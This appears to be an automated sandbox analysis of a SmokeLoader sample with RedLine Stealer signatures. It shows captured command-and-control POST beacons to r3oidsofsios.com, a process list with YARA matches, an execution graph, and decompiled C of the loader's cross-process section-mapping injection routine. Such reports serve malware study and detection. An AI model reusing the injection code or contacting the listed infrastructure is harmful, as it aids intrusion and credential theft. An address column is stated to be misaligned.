                          Nov 30, 2022 00:12:34.068521023 CET | 299                | OUT       | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 93 02 1f d3 26 f2 fe 75 aa 71 1c 48
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uqHA?3]JNV2aA4I0<P$#SfMpA;)zDzjg%rfdGtAMSrRcq?A<EL>Zg~k{JNc/O-M^UlD%&Q4
                          Nov 30, 2022 00:12:34.185307026 CET | 299                | IN        | HTTP/1.1 200 OK
                          Date: Tue, 29 Nov 2022 23:12:34 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=utf-8


                          Session ID | Source IP   | Source Port | Destination IP  | Destination Port | Process
                          6          | 192.168.2.7 | 49721       | 185.246.221.151 | 80               | C:\Windows\explorer.exe
                          Timestamp                           | kBytes transferred | Direction | Data
                          Nov 30, 2022 00:12:34.521208048 CET | 300                | OUT       | POST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://cygghp.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 217
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:34.524586916 CET | 300                | OUT       | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 92 02 1f d3 26 f2 fe 75 ea 65 5b 25
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&ue[%3XtPW5(,\78</fKU.a-pi]B]?Jo#eyws/jrBth{C =,3{KWu5
                          Nov 30, 2022 00:12:34.641350031 CET | 301                | IN        | HTTP/1.1 200 OK
                          Date: Tue, 29 Nov 2022 23:12:34 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=utf-8


                          Session ID | Source IP   | Source Port | Destination IP  | Destination Port | Process
                          7          | 192.168.2.7 | 49722       | 185.246.221.151 | 80               | C:\Windows\explorer.exe
                          Timestamp                           | kBytes transferred | Direction | Data
                          Nov 30, 2022 00:12:34.698724031 CET | 301                | OUT       | POST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://dtxwodx.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 127
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:34.698757887 CET | 302                | OUT       | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 91 02 1f d3 26 f2 fe 75 a4 13 01 37
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&u7fB(M')@."^T:"-ATCC'v
                          Nov 30, 2022 00:12:34.817260981 CET | 302 | IN | HTTP/1.1 200 OK
                          Date: Tue, 29 Nov 2022 23:12:34 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=utf-8


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          8 | 192.168.2.7 | 49723 | 185.246.221.151 | 80 | C:\Windows\explorer.exe
                          Timestamp | kBytes transferred | Direction | Data
                          Nov 30, 2022 00:12:34.881849051 CET | 303 | OUT | POST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://wypuksbjb.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 177
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:34.881849051 CET | 303 | OUT | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 90 02 1f d3 26 f2 fe 75 b1 77 2e 33
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uw.39nHk9I ~xl.==xTgt7;>J\C14w<e9T_b9UX)hT
                          Nov 30, 2022 00:12:35.017662048 CET | 304 | IN | HTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:34 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          9 | 192.168.2.7 | 49724 | 185.246.221.151 | 80 | C:\Windows\explorer.exe
                          Timestamp | kBytes transferred | Direction | Data
                          Nov 30, 2022 00:12:35.348030090 CET | 305 | OUT | POST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://qgjuekrsef.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 294
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:35.348050117 CET | 305 | OUT | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 9f 02 1f d3 26 f2 fe 75 ee 74 1f 5b
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&ut[?%IQpPYo$7BRO>5X:JS,Zu.Y(j#(K^]Qk7GZ2aTNN>M\1_L\B+Tn$*&L?c?su
                          Nov 30, 2022 00:12:35.459623098 CET | 305 | IN | HTTP/1.1 200 OK
                          Date: Tue, 29 Nov 2022 23:12:35 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=utf-8


                          Target ID:0
                          Start time:00:11:25
                          Start date:30/11/2022
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\file.exe
                          Imagebase:0x400000
                          File size:148992 bytes
                          MD5 hash:F39DBBCDCAAC9C8D2039B855C752C214
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.347095759.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.347095759.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.346601770.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.346812958.000000000060A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.346666685.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.346666685.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.245341240.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low

                          Target ID:1
                          Start time:00:11:32
                          Start date:30/11/2022
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Explorer.EXE
                          Imagebase:0x7ff75ed40000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.338708718.0000000002661000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.338708718.0000000002661000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:high

                          Target ID:9
                          Start time:00:12:31
                          Start date:30/11/2022
                          Path:C:\Users\user\AppData\Roaming\jdggfai
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Roaming\jdggfai
                          Imagebase:0x400000
                          File size:148992 bytes
                          MD5 hash:F39DBBCDCAAC9C8D2039B855C752C214
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.407040058.0000000000748000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.406829127.0000000000700000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.406829127.0000000000700000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000003.388354905.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000002.406779661.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.407192385.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.407192385.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low

                          Target ID:10
                          Start time:00:12:40
                          Start date:30/11/2022
                          Path:C:\Windows\SysWOW64\explorer.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\explorer.exe
                          Imagebase:0xd70000
                          File size:3611360 bytes
                          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000A.00000000.405631874.0000000000CF0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:high

                          Target ID:11
                          Start time:00:12:43
                          Start date:30/11/2022
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\explorer.exe
                          Imagebase:0x7ff75ed40000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:12
                          Start time:00:12:44
                          Start date:30/11/2022
                          Path:C:\Windows\SysWOW64\explorer.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\explorer.exe
                          Imagebase:0xd70000
                          File size:3611360 bytes
                          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000C.00000000.411589845.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          Reputation:high

                          Target ID:13
                          Start time:00:12:46
                          Start date:30/11/2022
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\explorer.exe
                          Imagebase:0x7ff75ed40000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.507736401.0000000000F41000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          Reputation:high

                          Target ID:14
                          Start time:00:12:47
                          Start date:30/11/2022
                          Path:C:\Windows\SysWOW64\explorer.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\explorer.exe
                          Imagebase:0xd70000
                          File size:3611360 bytes
                          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000000.417608043.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:high

                          Target ID:15
                          Start time:00:12:49
                          Start date:30/11/2022
                          Path:C:\Windows\SysWOW64\explorer.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\explorer.exe
                          Imagebase:0xd70000
                          File size:3611360 bytes
                          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000F.00000000.420288650.00000000031E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                          Target ID:16
                          Start time:00:12:50
                          Start date:30/11/2022
                          Path:C:\Windows\SysWOW64\explorer.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\explorer.exe
                          Imagebase:0xd70000
                          File size:3611360 bytes
                          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000010.00000000.423035885.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                          Target ID:17
                          Start time:00:12:51
                          Start date:30/11/2022
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\explorer.exe
                          Imagebase:0x7ff75ed40000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language

                          Target ID:20
                          Start time:00:12:52
                          Start date:30/11/2022
                          Path:C:\Windows\SysWOW64\explorer.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\explorer.exe
                          Imagebase:0xd70000
                          File size:3611360 bytes
                          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000014.00000000.428749130.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                            Execution Graph

                            Execution Coverage:3.6%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:46.2%
                            Total number of Nodes:52
                            Total number of Limit Nodes:1
                            execution_graph (one node per line as "id address [API called]", one edge per line as "from->to")
                            4216 402f00
                            4217 402f2f
                            4216->4217
                            4218 4019b6 8 API calls
                            4217->4218
                            4219 402ff6
                            4217->4219
                            4218->4219
                            4224 4019c1
                            4225 4019c4
                            4224->4225
                            4226 401a03 Sleep
                            4225->4226
                            4227 401a1e
                            4226->4227
                            4228 4015d5 7 API calls
                            4227->4228
                            4229 401a2f
                            4227->4229
                            4228->4229
                            4182 40300f
                            4183 402fcc
                            4182->4183
                            4184 402ff6
                            4182->4184
                            4185 4019b6 8 API calls
                            4183->4185
                            4185->4184
                            4124 402f51
                            4126 402f55
                            4124->4126
                            4125 402ff6
                            4126->4125
                            4128 4019b6
                            4126->4128
                            4129 4019c7
                            4128->4129
                            4130 401a03 Sleep
                            4129->4130
                            4131 401a1e
                            4130->4131
                            4133 401a2f
                            4131->4133
                            4134 4015d5
                            4131->4134
                            4133->4125
                            4135 4015e3
                            4134->4135
                            4136 40179d
                            4135->4136
                            4137 401681 NtDuplicateObject
                            4135->4137
                            4136->4133
                            4137->4136
                            4138 40169e NtCreateSection
                            4137->4138
                            4139 4016c4 NtMapViewOfSection
                            4138->4139
                            4140 40171e NtCreateSection
                            4138->4140
                            4139->4140
                            4141 4016e7 NtMapViewOfSection
                            4139->4141
                            4140->4136
                            4142 40174a
                            4140->4142
                            4141->4140
                            4143 401705
                            4141->4143
                            4142->4136
                            4144 401754 NtMapViewOfSection
                            4142->4144
                            4143->4140
                            4144->4136
                            4145 40177b NtMapViewOfSection
                            4144->4145
                            4145->4136
                            4230 4015d4
                            4231 4015e3
                            4230->4231
                            4232 401681 NtDuplicateObject
                            4231->4232
                            4241 40179d
                            4231->4241
                            4233 40169e NtCreateSection
                            4232->4233
                            4232->4241
                            4234 4016c4 NtMapViewOfSection
                            4233->4234
                            4235 40171e NtCreateSection
                            4233->4235
                            4234->4235
                            4236 4016e7 NtMapViewOfSection
                            4234->4236
                            4237 40174a
                            4235->4237
                            4235->4241
                            4236->4235
                            4238 401705
                            4236->4238
                            4239 401754 NtMapViewOfSection
                            4237->4239
                            4237->4241
                            4238->4235
                            4240 40177b NtMapViewOfSection
                            4239->4240
                            4239->4241
                            4240->4241
                            4210 401a39
                            4211 4019ce
                            4210->4211
                            4213 401a2f
                            4210->4213
                            4212 401a03 Sleep
                            4211->4212
                            4214 401a1e
                            4212->4214
                            4214->4213
                            4215 4015d5 7 API calls
                            4214->4215
                            4215->4213

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph (one basic block per line as "id address-range [call]", one edge per line as "from->to")
                            0 4015d5-4015de
                            1 4015e3-4015ef
                            0->1
                            2 4015ec
                            0->2
                            4 401603
                            1->4
                            5 4015f4-40162b call 401274
                            1->5
                            2->1
                            4->5
                            12 401630-401635
                            5->12
                            13 40162d
                            5->13
                            15 401956-40195e
                            12->15
                            16 40163b-40164c
                            12->16
                            13->12
                            15->12
                            19 401963-4019b3 call 401274
                            15->19
                            20 401652-40167b
                            16->20
                            21 401954
                            16->21
                            20->21
                            28 401681-401698 NtDuplicateObject
                            20->28
                            21->19
                            28->21
                            30 40169e-4016c2 NtCreateSection
                            28->30
                            32 4016c4-4016e5 NtMapViewOfSection
                            30->32
                            33 40171e-401744 NtCreateSection
                            30->33
                            32->33
                            36 4016e7-401703 NtMapViewOfSection
                            32->36
                            33->21
                            37 40174a-40174e
                            33->37
                            36->33
                            38 401705-40171b
                            36->38
                            37->21
                            39 401754-401775 NtMapViewOfSection
                            37->39
                            38->33
                            39->21
                            42 40177b-401797 NtMapViewOfSection
                            39->42
                            42->21
                            45 40179d call 4017a2
                            42->45
                            C-Code - Quality: 55%
                            			E004015D5(void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                            				char _v8;
                            				long _v12;
                            				void* _v16;
                            				void* _v20;
                            				char _v44;
                            				char _v52;
                            				long _v56;
                            				long _v60;
                            				char _v64;
                            				char _v68;
                            				char _v72;
                            				char _v76;
                            				char _v84;
                            				char _v88;
                            				char _v92;
                            				intOrPtr _v96;
                            				char _v100;
                            				void* __ebx;
                            				void* __esi;
                            				intOrPtr _t88;
                            				void* _t91;
                            				intOrPtr _t92;
                            				struct _GUID _t99;
                            				struct _GUID _t101;
                            				PVOID* _t103;
                            				PVOID* _t105;
                            				intOrPtr* _t109;
                            				PVOID* _t122;
                            				PVOID* _t124;
                            				intOrPtr _t128;
                            				void** _t131;
                            				signed int _t138;
                            				int _t139;
                            				void* _t156;
                            				signed int _t160;
                            				signed int _t161;
                            				signed int _t162;
                            				signed int _t163;
                            				signed int _t164;
                            				void* _t165;
                            				intOrPtr* _t166;
                            				void* _t169;
                            				intOrPtr _t178;
                            				void* _t179;
                            				void* _t180;
                            				void* _t185;
                            				HANDLE* _t186;
                            				HANDLE* _t187;
                            				void* _t192;
                            				intOrPtr* _t195;
                            				intOrPtr _t198;
                            				void* _t199;
                            				intOrPtr* _t200;
                            				void* _t203;
                            				long _t218;
                            
                            				_push(0x392);
                            				_t200 = _t199 + 4;
                            				L00401274(0x161d, 0xf1, _t185, __eflags);
                            				_t128 = _a4;
                            				_v56 = 0;
                            				if(gs != 0) {
                            					_v56 = _v56 + 1;
                            				}
                            				while(1) {
                            					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                            					if(_t88 != 0) {
                            						break;
                            					}
                            					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                            				}
                            				_v96 = _t88;
                            				_t186 =  &_v100;
                            				 *_t186 = 0;
                            				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t186);
                            				_t91 =  *_t186;
                            				if(_t91 != 0) {
                            					_t131 =  &_v52;
                            					 *_t131 = _t91;
                            					_t131[1] = 0;
                            					_t186 =  &_v44;
                            					 *((intOrPtr*)(_t128 + 0x10))(_t186, 0x18);
                            					 *_t186 = 0x18;
                            					_push( &_v52);
                            					_push(_t186);
                            					_push(0x40);
                            					_push( &_v20);
                            					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, 0, 0, 2) == 0) {
                            						_v12 = 0;
                            						_t99 =  &_v84;
                            						 *((intOrPtr*)(_t99 + 4)) = 0;
                            						 *_t99 = 0x5000;
                            						_t187 =  &_v88;
                            						if(NtCreateSection(_t187, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                            							_push(_v84);
                            							_pop( *_t25);
                            							_t122 =  &_v72;
                            							 *_t122 = 0;
                            							if(NtMapViewOfSection( *_t187, 0xffffffff, _t122, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                            								_t124 =  &_v64;
                            								 *_t124 = 0;
                            								if(NtMapViewOfSection( *_t187, _v16, _t124, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                            									_t198 = _v72;
                            									 *((intOrPtr*)(_t128 + 0x20))(0, _t198, 0x104);
                            									 *((intOrPtr*)(_t198 + 0x208)) = _a16;
                            									_v12 = _v12 + 1;
                            								}
                            							}
                            						}
                            						_t101 =  &_v84;
                            						 *((intOrPtr*)(_t101 + 4)) = 0;
                            						 *_t101 = _a12 + 0x10000;
                            						_t186 =  &_v92;
                            						if(NtCreateSection(_t186, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 && _v12 != 0) {
                            							_push(_v84);
                            							_pop( *_t46);
                            							_t103 =  &_v76;
                            							 *_t103 = 0;
                            							if(NtMapViewOfSection( *_t186, 0xffffffff, _t103, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                            								_t105 =  &_v68;
                            								 *_t105 = 0;
                            								_t218 = NtMapViewOfSection( *_t186, _v16, _t105, 0, 0, 0,  &_v60, 1, 0, 0x20);
                            								if(_t218 == 0) {
                            									L24();
                            									if(_t218 == 0 && _t218 != 0) {
                            										asm("hlt");
                            										_push(_t200);
                            									}
                            									_push(0x2ea6);
                            									_t203 = _t200 + 4;
                            									_t160 = 0x2260;
                            									_t161 = _t160 << 5;
                            									_t162 = _t161 + 0x2260;
                            									asm("lodsb");
                            									_t163 = _t162;
                            									asm("loop 0xffffffc4");
                            									_t164 = _t163 ^ 0xad610a21;
                            									_t200 = _t203 - _t164;
                            									_t192 = _a8 +  *_a8;
                            									_t138 =  *(_t192 + 6) & 0x0000ffff;
                            									_push(_t192);
                            									_t165 = _t192;
                            									if(_v56 == 0) {
                            										_t166 = _t165 + 0xf8;
                            										__eflags = _t166;
                            									} else {
                            										_t166 = _t165 + 0x108;
                            									}
                            									_push(_t138);
                            									_t139 =  *(_t166 + 0x10);
                            									if(_t139 != 0) {
                            										memcpy( *((intOrPtr*)(_t166 + 0xc)) + _v76,  *((intOrPtr*)(_t166 + 0x14)) + _a8, _t139);
                            										_t200 = _t200 + 0xc;
                            									}
                            									asm("loop 0xffffffe6");
                            									_pop(_t186);
                            									_t222 = _v56;
                            									if(_v56 == 0) {
                            										_push(_t186);
                            										_t169 = _t186[0xd] - _v68;
                            										_t195 = _t186[0x28] + _v76;
                            										__eflags = _t195;
                            										while(1) {
                            											__eflags =  *_t195;
                            											if( *_t195 == 0) {
                            												break;
                            											}
                            											_t178 =  *_t195;
                            											_t195 = _t195 + 8;
                            											asm("lodsw");
                            											__eflags = 0;
                            											if(0 != 0) {
                            												 *0x00000000 =  *0x00000000 - _t169;
                            												__eflags =  *((intOrPtr*)(0 + _v76 + _t178));
                            											}
                            											asm("loop 0xffffffe9");
                            										}
                            										_pop(_t186);
                            										__eflags = 0;
                            										_t109 =  &_v8;
                            										 *_t109 = 0;
                            										 *((intOrPtr*)(_t128 + 0x98))(_v16, 0, 0, 0, 0, 0, _t186[0xa] + _v68, _v64, _t109, 0);
                            									} else {
                            										L57();
                            										_pop(_t179);
                            										_t180 = _t179 - 0x1892;
                            										 *((intOrPtr*)(_t180 + 0x18c6)) = _t180 + 0x304c;
                            										L004012E3(_t128, _t222);
                            										0x33(_t180 + 0x304c, 0x1ad);
                            										 *((intOrPtr*)(_t180 + 0x18eb)) = _t180 + 0x309c;
                            										0x33();
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				_push(0x161d);
                            				_t92 =  *_t200;
                            				_push(0x392);
                            				_t156 = 0xf1;
                            				return L00401274(_t92, _t156, _t186, _t222);
                            			}

Instruction address column for the listing above (one address per C statement, 0x004015f4 through 0x004019b3; flattened by extraction and no longer aligned with the statements it annotated)

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
